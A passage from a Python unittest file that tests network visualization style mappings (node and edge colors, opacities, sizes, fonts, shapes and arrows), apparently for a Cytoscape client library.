@print_entry_exit
def test_delete_style_mapping(self):
# Initialization
load_test_session()
# Get all of the properties in a list and delete the first one
all_props = get_style_all_mappings(self._GAL_FILTERED_STYLE)
prop_to_delete = all_props[0]['visualProperty']
res = delete_style_mapping(self._GAL_FILTERED_STYLE, prop_to_delete)
self.assertEqual(res, '')
# Verify that after the delete, the style is no longer present
remaining_props = get_style_all_mappings(self._GAL_FILTERED_STYLE)
del all_props[0]
self.assertListEqual(all_props, remaining_props)
# Verify that an invalid style or property is caught
self.assertRaises(CyError, delete_style_mapping, 'bogus style', prop_to_delete)
self.assertIsNone(delete_style_mapping(self._GAL_FILTERED_STYLE, 'bogus property'))
@unittest.skip('NODE_LABEL doesnt seem to exist ... maybe because of a timing race condition??')
@print_entry_exit
def test_update_style_mapping(self):
# Initialization
load_test_session()
# Replace the existing NODE_LABEL property with a different one, and verify that it was replaced
existing_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
new_prop = map_visual_property('NODE_LABEL', 'name', 'p')
self.assertEqual(update_style_mapping(self._GAL_FILTERED_STYLE, new_prop), '')
replaced_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
self._check_property(replaced_prop, 'NODE_LABEL', 'name', 'String', 'passthrough')
# Remove the NODE_LABEL property, verify it's removed, then re-add the original property ane verify
self.assertEqual(delete_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL'), '')
self.assertRaises(CyError, get_style_mapping, self._GAL_FILTERED_STYLE, 'NODE_LABEL')
# WARNING: This update often fails silently, which causes the get_style_mapping to fail [Cytoscape BUG]
self.assertEqual(update_style_mapping(self._GAL_FILTERED_STYLE, existing_prop), '')
### Failed ... NODE_LABEL doesn't seem to exist ... maybe because of a timing race condition??
readded_prop = get_style_mapping(self._GAL_FILTERED_STYLE, 'NODE_LABEL')
self._check_property(readded_prop, existing_prop['visualProperty'], existing_prop['mappingColumn'],
existing_prop['mappingColumnType'], existing_prop['mappingType'])
# Verify that an invalid style or property is caught
self.assertRaises(CyError, update_style_mapping, 'bogus style', new_prop)
self.assertRaises(TypeError, update_style_mapping, self._GAL_FILTERED_STYLE, 'bogus property')
@print_entry_exit
def test_set_node_border_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_node_property({'prop_func': set_node_border_color_mapping,
'prop_name': 'NODE_BORDER_PAINT',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_border_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_node_property({'prop_func': set_node_border_opacity_mapping,
'prop_name': 'NODE_BORDER_TRANSPARENCY',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_border_width_mapping(self):
_NEW_DEFAULT = 4
_PASSTHRU_VAL = 3
self._check_set_node_property({'prop_func': set_node_border_width_mapping,
'prop_name': 'NODE_BORDER_WIDTH',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'widths': [5, 10]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'width': [550, 100]}, ... no bounds checking for this property
'cont_short_map_params': {'widths': [5]},
'disc_test_params': {'widths': [5, 10], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_width': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_node_property({'prop_func': set_node_color_mapping,
'prop_name': 'NODE_FILL_COLOR',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_combo_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_node_property({'prop_func': set_node_combo_opacity_mapping,
'prop_name': ['NODE_TRANSPARENCY', 'NODE_BORDER_TRANSPARENCY',
'NODE_LABEL_TRANSPARENCY'],
'new_default': _NEW_DEFAULT,
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'set_default': 'p',
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_fill_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_node_property({'prop_func': set_node_fill_opacity_mapping,
'prop_name': 'NODE_TRANSPARENCY',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_font_face_mapping(self):
_NEW_DEFAULT = 'Dialog.bold,bold,12'
_PASSTHRU_VAL = 'Dialog.italic,plain,12'
self._check_set_node_property({'prop_func': set_node_font_face_mapping,
'prop_name': 'NODE_LABEL_FONT_FACE',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12']},
'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'fonts': ['Arial bogus,plain,12', 'Arial Bold,bold,12']},
# 'cont_short_map_params': {'fonts': ['Arial,plain,12']},
'disc_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12'],
'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_font': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_font_size_mapping(self):
_NEW_DEFAULT = 20
_PASSTHRU_VAL = 40
self._check_set_node_property({'prop_func': set_node_font_size_mapping,
'prop_name': 'NODE_LABEL_FONT_SIZE',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'sizes': [20, 80]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'sizes': [20, 80]},
'cont_short_map_params': {'sizes': [20]},
'disc_test_params': {'sizes': [40, 90], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_size': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_height_mapping(self):
_NEW_DEFAULT = 120
_PASSTHRU_VAL = 140
self._check_set_node_property({'prop_func': set_node_height_mapping,
'prop_name': 'NODE_HEIGHT',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
'compare_tolerance_percent': 2,
'cont_test_params': {'heights': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'heights': [120, 180]},
'cont_short_map_params': {'heights': [120]},
'disc_test_params': {'heights': [140, 190], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_height': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_label_mapping(self):
# _NEW_DEFAULT = 'Test'
_PASSTHRU_VAL = 'name'
self._check_set_node_property({'prop_func': set_node_label_mapping,
'prop_name': 'NODE_LABEL',
# 'new_default': _NEW_DEFAULT,
# 'set_default' : 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'heights': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'heights': [120, 180]},
# 'cont_short_map_params': {'heights': [120]},
# 'disc_test_params': {'heights': [140, 190]},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_node_label_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_node_property({'prop_func': set_node_label_color_mapping,
'prop_name': 'NODE_LABEL_COLOR',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_label_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_node_property({'prop_func': set_node_label_opacity_mapping,
'prop_name': 'NODE_LABEL_TRANSPARENCY',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [50, 100], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_shape_mapping(self):
_NEW_DEFAULT = 'PARALLELOGRAM'
# _PASSTHRU_VAL = 250
self._check_set_node_property({'prop_func': set_node_shape_mapping,
'prop_name': 'NODE_SHAPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'shapes': ['OCTAGON', 'TRIANGLE'],
'default_shape': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@unittest.skip('Fetching NODE_SIZE always returns the default node size instead of the current node size')
@print_entry_exit
def test_set_node_size_mapping(self):
_NEW_DEFAULT = 80
_PASSTHRU_VAL = 20
self._check_set_node_property({'prop_func': set_node_size_mapping,
'prop_name': 'NODE_SIZE',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'sizes': [60, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'sizes': [120, 180]},
'cont_short_map_params': {'sizes': [120]},
'disc_test_params': {'sizes': [60, 80], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_size': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_node_tooltip_mapping(self):
# _NEW_DEFAULT = 'Test'
_PASSTHRU_VAL = 'tooltip text'
# TODO: This fails because of a race condition when reading the tooltip immediately after setting it
self._check_set_node_property({'prop_func': set_node_tooltip_mapping,
'prop_name': 'NODE_TOOLTIP',
# 'new_default': _NEW_DEFAULT,
# 'set_default' : 'p',
# 'compare_tolerance_percent': 0,
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'heights': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'heights': [120, 180]},
# 'cont_short_map_params': {'heights': [120]},
# 'disc_test_params': {'heights': [140, 190]},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_node_width_mapping(self):
_NEW_DEFAULT = 120
_PASSTHRU_VAL = 140
self._check_set_node_property({'prop_func': set_node_width_mapping,
'prop_name': 'NODE_WIDTH',
'new_default': _NEW_DEFAULT,
'set_default': 'c',
'passthru_val': _PASSTHRU_VAL,
'compare_tolerance_percent': 20,
'cont_test_params': {'widths': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'widths': [120, 180]},
'cont_short_map_params': {'widths': [120]},
'disc_test_params': {'widths': [140, 190], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_width': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@unittest.skip('Unknown interaction between the two properties and the "Edge color to arrows" check box')
@print_entry_exit
def test_set_edge_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_edge_property({'prop_func': set_edge_color_mapping,
'prop_name': ['EDGE_UNSELECTED_PAINT', 'EDGE_STROKE_UNSELECTED_PAINT'],
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_font_face_mapping(self):
_NEW_DEFAULT = 'Dialog.bold,bold,12'
_PASSTHRU_VAL = 'Dialog.italic,plain,12'
self._check_set_edge_property({'prop_func': set_edge_font_face_mapping,
'prop_name': 'EDGE_LABEL_FONT_FACE',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12']},
'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'fonts': ['Arial bogus,plain,12', 'Arial Bold,bold,12']},
# 'cont_short_map_params': {'fonts': ['Arial,plain,12']},
'disc_test_params': {'fonts': ['Arial,plain,12', 'Arial Bold,bold,12'],
'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_font': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_font_size_mapping(self):
_NEW_DEFAULT = 20
_PASSTHRU_VAL = 40
self._check_set_edge_property({'prop_func': set_edge_font_size_mapping,
'prop_name': 'EDGE_LABEL_FONT_SIZE',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'sizes': [20, 80]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'sizes': [20, 80]},
'cont_short_map_params': {'sizes': [20]},
'disc_test_params': {'sizes': [40, 90], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_size': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_label_mapping(self):
# _NEW_DEFAULT = 'Test'
_PASSTHRU_VAL = 'name'
self._check_set_edge_property({'prop_func': set_edge_label_mapping,
'prop_name': 'EDGE_LABEL',
# 'new_default': _NEW_DEFAULT,
# 'set_default' : 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'heights': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'heights': [120, 180]},
# 'cont_short_map_params': {'heights': [120]},
# 'disc_test_params': {'heights': [140, 190]},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_label_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_edge_property({'prop_func': set_edge_label_color_mapping,
'prop_name': 'EDGE_LABEL_COLOR',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_label_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_label_opacity_mapping,
'prop_name': 'EDGE_LABEL_TRANSPARENCY',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [150, 200], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_line_style_mapping(self):
_NEW_DEFAULT = 'EQUAL_DASH'
# _PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_line_style_mapping,
'prop_name': 'EDGE_LINE_TYPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'line_styles': ['ZIGZAG', 'SINEWAVE'],
'default_line_style': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_line_width_mapping(self):
_NEW_DEFAULT = 20
_PASSTHRU_VAL = 40
self._check_set_edge_property({'prop_func': set_edge_line_width_mapping,
'prop_name': 'EDGE_WIDTH',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'widths': [5, 10]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'width': [550, 100]}, ... no bounds checking for this property
'cont_short_map_params': {'widths': [5]},
'disc_test_params': {'widths': [5, 10], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_width': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_opacity_mapping(self):
_NEW_DEFAULT = 225
_PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_opacity_mapping,
'prop_name': 'EDGE_TRANSPARENCY',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'opacities': [550, 100]},
'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'opacities': [75, 100], 'mapping_type': 'd'},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_target_arrow_mapping(self):
_NEW_DEFAULT = 'CIRCLE'
# _PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_target_arrow_maping,
'prop_name': 'EDGE_TARGET_ARROW_SHAPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
'default_shape': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_source_arrow_mapping(self):
_NEW_DEFAULT = 'CIRCLE'
# _PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_source_arrow_mapping,
'prop_name': 'EDGE_SOURCE_ARROW_SHAPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
'default_shape': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_target_arrow_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_edge_property({'prop_func': set_edge_target_arrow_color_mapping,
'prop_name': 'EDGE_TARGET_ARROW_UNSELECTED_PAINT',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_source_arrow_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_edge_property({'prop_func': set_edge_source_arrow_color_mapping,
'prop_name': 'EDGE_SOURCE_ARROW_UNSELECTED_PAINT',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_target_arrow_color_mapping(self):
_NEW_DEFAULT = '#654321'
_PASSTHRU_VAL = '#123456'
self._check_set_edge_property({'prop_func': set_edge_target_arrow_color_mapping,
'prop_name': 'EDGE_TARGET_ARROW_UNSELECTED_PAINT',
'new_default': _NEW_DEFAULT,
'set_default': 'p',
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
